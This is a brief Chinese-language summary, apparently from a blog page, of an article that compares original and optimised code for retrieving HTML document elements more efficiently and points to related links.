本文详细阐述了改进HTML文档操作代码实现的过程,通过对比原始代码与优化后的代码,展示了如何更高效地获取HTML文档元素。同时,文章提供了相关链接以供深入研究。
扫一扫
2753
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
